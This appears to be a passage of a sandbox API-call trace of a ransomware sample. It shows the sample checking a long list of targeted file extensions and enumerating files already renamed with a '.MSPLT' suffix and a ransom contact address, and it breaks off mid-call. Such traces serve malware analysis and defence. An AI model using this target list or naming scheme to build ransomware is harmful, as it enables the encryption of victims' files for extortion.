lstrlenW (lpString=".cfu") returned 4 [0282.927] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".chm") returned 4 [0282.927] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".cin") returned 4 [0282.927] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".class") returned 6 [0282.927] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0282.927] lstrlenW (lpString=".clx") returned 4 [0282.927] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".config") returned 7 [0282.927] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0282.927] lstrlenW (lpString=".cpp") returned 4 [0282.927] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".cr2") returned 4 [0282.927] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".crt") returned 4 [0282.927] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".crw") returned 4 [0282.927] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0282.927] lstrlenW (lpString=".cs") returned 3 [0282.928] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0282.928] lstrlenW (lpString=".css") returned 4 [0282.928] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".csv") returned 4 [0282.928] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".cub") returned 4 [0282.928] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".dae") returned 4 [0282.928] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".dat") returned 4 [0282.928] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".db") returned 3 [0282.928] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0282.928] lstrlenW (lpString=".dbf") returned 4 [0282.928] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".dbx") returned 4 [0282.928] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".dc3") returned 4 [0282.928] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".dcm") returned 4 [0282.928] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0282.928] lstrlenW (lpString=".dcr") returned 4 [0282.929] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".der") returned 4 [0282.929] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".dib") returned 4 [0282.929] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".dic") returned 4 [0282.929] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".dif") returned 4 [0282.929] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".divx") returned 5 [0282.929] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0282.929] lstrlenW (lpString=".djvu") returned 5 [0282.929] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0282.929] lstrlenW (lpString=".dng") returned 4 [0282.929] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".doc") returned 4 [0282.929] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".docm") returned 5 [0282.929] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0282.929] lstrlenW (lpString=".docx") returned 5 [0282.929] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0282.929] lstrlenW (lpString=".dot") returned 4 [0282.929] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0282.929] lstrlenW (lpString=".dotm") returned 5 [0282.929] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0282.929] lstrlenW (lpString=".dotx") returned 5 [0282.929] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0282.929] lstrlenW (lpString=".dpx") returned 4 [0282.929] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".dqy") returned 4 [0282.930] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".dsn") returned 4 [0282.930] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".dt") returned 3 [0282.930] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0282.930] lstrlenW (lpString=".dtd") returned 4 [0282.930] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".dwg") returned 4 [0282.930] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".dwt") returned 4 [0282.930] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".dx") returned 3 [0282.930] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0282.930] lstrlenW (lpString=".dxf") returned 4 [0282.930] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".edml") returned 5 [0282.930] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0282.930] lstrlenW (lpString=".efd") returned 4 [0282.930] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".elf") returned 4 [0282.930] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".emf") returned 4 [0282.930] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".emz") returned 4 [0282.930] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".epf") returned 4 [0282.930] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0282.930] lstrlenW (lpString=".eps") returned 4 [0282.930] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".epsf") returned 5 [0282.931] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0282.931] lstrlenW (lpString=".epsp") returned 5 [0282.931] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0282.931] lstrlenW (lpString=".erf") returned 4 [0282.931] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".exr") returned 4 [0282.931] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".f4v") returned 4 [0282.931] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".fido") returned 5 [0282.931] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0282.931] lstrlenW (lpString=".flm") returned 4 [0282.931] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".flv") returned 4 [0282.931] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".frm") returned 4 [0282.931] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".fxg") returned 4 [0282.931] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".geo") returned 4 [0282.931] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".gif") returned 4 [0282.931] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0282.931] lstrlenW (lpString=".grs") returned 4 [0282.932] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".gz") returned 3 [0282.932] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0282.932] lstrlenW (lpString=".h") returned 2 [0282.932] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0282.932] lstrlenW (lpString=".hdr") returned 4 [0282.932] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".hpp") returned 4 [0282.932] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".hta") returned 4 [0282.932] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".htc") returned 4 [0282.932] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".htm") returned 4 [0282.932] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".html") returned 5 [0282.932] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0282.932] lstrlenW (lpString=".icb") returned 4 [0282.932] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".ics") returned 4 [0282.932] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0282.932] lstrlenW (lpString=".iff") returned 4 [0282.933] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".inc") returned 4 [0282.933] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".indd") returned 5 [0282.933] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0282.933] lstrlenW (lpString=".ini") returned 4 [0282.933] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".iqy") returned 4 [0282.933] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".j2c") returned 4 [0282.933] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".j2k") returned 4 [0282.933] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".java") returned 5 [0282.933] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0282.933] lstrlenW (lpString=".jp2") returned 4 [0282.933] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".jpc") returned 4 [0282.933] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".jpe") returned 4 [0282.933] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".jpeg") returned 5 [0282.933] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0282.933] lstrlenW (lpString=".jpf") returned 4 [0282.933] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".jpg") returned 4 [0282.933] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0282.933] lstrlenW (lpString=".jpx") returned 4 [0282.934] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".js") returned 3 [0282.934] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0282.934] lstrlenW (lpString=".jsf") returned 4 [0282.934] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".json") returned 5 [0282.934] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0282.934] lstrlenW (lpString=".jsp") returned 4 [0282.934] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".kdc") returned 4 [0282.934] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".kmz") returned 4 [0282.934] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".kwm") returned 4 [0282.934] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".lasso") returned 6 [0282.934] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0282.934] lstrlenW (lpString=".lbi") returned 4 [0282.934] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".lgf") returned 4 [0282.934] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".lgp") returned 4 [0282.934] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".log") returned 4 [0282.934] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".m1v") returned 4 [0282.934] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0282.934] lstrlenW (lpString=".m4a") returned 4 [0282.935] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".m4v") returned 4 [0282.935] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".max") returned 4 [0282.935] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".md") returned 3 [0282.935] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0282.935] lstrlenW (lpString=".mda") returned 4 [0282.935] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mdb") returned 4 [0282.935] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mde") returned 4 [0282.935] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mdf") returned 4 [0282.935] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mdw") returned 4 [0282.935] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mef") returned 4 [0282.935] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mft") returned 4 [0282.935] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mfw") returned 4 [0282.935] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mht") returned 4 [0282.935] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0282.935] lstrlenW (lpString=".mhtml") returned 6 [0282.935] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0282.935] lstrlenW (lpString=".mka") returned 4 [0282.936] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mkidx") returned 6 [0282.936] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0282.936] lstrlenW (lpString=".mkv") returned 4 [0282.936] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mos") returned 4 [0282.936] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mov") returned 4 [0282.936] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mp3") returned 4 [0282.936] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mp4") returned 4 [0282.936] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mpeg") returned 5 [0282.936] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0282.936] lstrlenW (lpString=".mpg") returned 4 [0282.936] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mpv") returned 4 [0282.936] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mrw") returned 4 [0282.936] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".msg") returned 4 [0282.936] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".mxl") returned 4 [0282.936] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".myd") returned 4 [0282.936] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0282.936] lstrlenW (lpString=".myi") returned 4 [0282.936] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".nef") returned 4 [0282.937] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".nrw") returned 4 [0282.937] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".obj") returned 4 [0282.937] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".odb") returned 4 [0282.937] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".odc") returned 4 [0282.937] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".odm") returned 4 [0282.937] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".odp") returned 4 [0282.937] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".ods") returned 4 [0282.937] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".oft") returned 4 [0282.937] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".one") returned 4 [0282.937] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".onepkg") returned 7 [0282.937] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0282.937] lstrlenW (lpString=".onetoc2") returned 8 [0282.937] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0282.937] lstrlenW (lpString=".opt") returned 4 [0282.937] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0282.937] lstrlenW (lpString=".oqy") returned 4 [0282.938] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".orf") returned 4 [0282.938] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".p12") returned 4 [0282.938] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".p7b") returned 4 [0282.938] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".p7c") returned 4 [0282.938] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pam") returned 4 [0282.938] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pbm") returned 4 [0282.938] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pct") returned 4 [0282.938] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pcx") returned 4 [0282.938] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pdd") returned 4 [0282.938] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pdf") returned 4 [0282.938] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pdp") returned 4 [0282.938] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pef") returned 4 [0282.938] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pem") returned 4 [0282.938] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0282.938] lstrlenW (lpString=".pff") returned 4 [0282.939] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0282.939] lstrlenW (lpString=".pfm") returned 4 [0282.939] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0282.939] lstrlenW (lpString=".pfx") returned 4 [0282.939] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0282.939] lstrlenW (lpString=".pgm") returned 4 [0282.939] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0282.939] lstrlenW (lpString=".php") returned 4 [0282.939] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0282.939] lstrlenW (lpString=".php3") returned 5 [0282.939] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0282.939] lstrlenW (lpString=".php4") returned 5 [0282.939] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0282.939] lstrlenW (lpString=".php5") returned 5 [0282.939] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0282.939] lstrlenW (lpString=".phtml") returned 6 [0282.940] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0282.940] lstrlenW (lpString=".pict") returned 5 [0282.940] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0282.940] lstrlenW (lpString=".pl") returned 3 [0282.940] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0282.940] lstrlenW (lpString=".pls") returned 4 [0282.940] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0282.940] lstrlenW (lpString=".pm") returned 3 [0282.940] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0282.940] lstrlenW (lpString=".png") returned 4 [0282.940] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0282.940] lstrlenW (lpString=".pnm") returned 4 [0282.940] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0282.940] lstrlenW (lpString=".pot") returned 4 [0282.940] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0282.940] lstrlenW (lpString=".potm") returned 5 [0282.940] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0282.940] lstrlenW (lpString=".potx") returned 5 [0282.940] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0282.940] lstrlenW (lpString=".ppa") returned 4 [0282.941] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0282.941] lstrlenW (lpString=".ppam") returned 5 [0282.941] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0282.941] lstrlenW (lpString=".ppm") returned 4 [0282.941] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0282.941] lstrlenW (lpString=".pps") returned 4 [0282.941] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0282.941] lstrlenW (lpString=".ppsm") returned 5 [0282.941] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0282.941] lstrlenW (lpString=".ppt") returned 4 [0282.941] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0282.941] lstrlenW (lpString=".pptm") returned 5 [0282.941] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0282.941] lstrlenW (lpString=".pptx") returned 5 [0282.941] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0282.941] lstrlenW (lpString=".prn") returned 4 [0282.941] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0282.941] lstrlenW (lpString=".ps") returned 3 [0282.941] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0282.941] lstrlenW (lpString=".psb") returned 4 [0282.941] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0282.941] lstrlenW (lpString=".psd") returned 4 [0282.942] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".pst") returned 4 [0282.942] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".ptx") returned 4 [0282.942] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".pub") returned 4 [0282.942] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".pwm") returned 4 [0282.942] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".pxr") returned 4 [0282.942] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".py") returned 3 [0282.942] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0282.942] lstrlenW (lpString=".qt") returned 3 [0282.942] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0282.942] lstrlenW (lpString=".r3d") returned 4 [0282.942] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".raf") returned 4 [0282.942] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0282.942] lstrlenW (lpString=".rar") returned 4 [0282.943] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0282.943] lstrlenW (lpString=".raw") returned 4 [0282.943] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0282.943] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dd53c9, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dd53c9, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58dfb734, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1894, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="oobe_2017_09_07_03_08_57_737.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="OOBE_2~1.MSP")) returned 1 [0282.943] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dfb734, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dfb734, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 1 [0282.943] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dfb734, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dfb734, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 0 [0282.943] FindClose (in: hFindFile=0x48a130 | out: hFindFile=0x48a130) returned 1 [0282.945] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3880058 | out: hHeap=0x470000) returned 1 [0282.945] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0282.945] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3880058 [0282.945] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe3c4, 